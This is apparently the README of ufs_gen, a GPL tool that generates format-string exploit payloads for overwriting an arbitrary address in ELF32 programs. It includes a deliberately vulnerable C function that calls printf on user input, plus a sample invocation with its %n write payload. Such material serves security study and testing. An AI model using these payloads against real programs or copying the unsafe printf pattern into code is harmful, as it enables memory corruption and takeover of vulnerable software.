blob: b2d96797b6915241c3461d9d58b8d556fb4d5cbf (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
|
ufs_gen
=======
This software allows you to generate a payload which may override an address
with the value of your choice.
The syntax is quite simple:
There are three parameters needed for the program to run correctly.
stackidx: this parameter specifies how many dwords you need to access the
beginning of your buffer (or payload).
override: the address to override
with: the value to inject at the address overriden
This software is intended to work with an ELF32 generated by a typical code.
example:
int function(const char *payload)
{
char buffer[BUFSIZ];
strncpy(buffer, payload, sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
printf(buffer);
return 0;
}
The support of ELF64 and other formats is intended but not written yet.
Although the option 'addrsize' might already be used to specify if an address
is not 4 bytes long, there is very few chances that it would work correctly.
The support of printf(payload) directly (i.e. without a temporary buffer) is
also planned.
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
License
=======
This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.
|